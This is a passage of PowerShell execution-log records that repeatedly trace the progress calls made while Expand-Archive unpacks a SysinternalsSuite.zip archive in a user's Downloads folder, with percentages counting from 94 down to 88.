ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="291"
 
-RECORD 37----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 38----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="290"
 
-RECORD 39----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 40----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="289"
 
-RECORD 41----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 42----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="288"
 
-RECORD 43----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 44----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="287"
 
-RECORD 45----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 46----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="286"
 
-RECORD 47----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 48----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="285"
 
-RECORD 49----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 50----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="284"
 
-RECORD 51----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 52----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="283"
 
-RECORD 53----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 54----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="282"
 
-RECORD 55----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 56----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="281"
 
-RECORD 57----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 58----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="280"
 
-RECORD 59----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 60----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="279"
 
-RECORD 61----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 62----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="278"
 
-RECORD 63----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 64----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="277"
 
-RECORD 65----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 66----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="276"
 
-RECORD 67----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 68----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="275"
 
-RECORD 69----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 70----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="274"
 
-RECORD 71----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 72----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="273"
 
-RECORD 73----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 74----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="272"
 
-RECORD 75----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 76----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="271"
 
-RECORD 77----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 78----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="270"
 
-RECORD 79----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 80----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
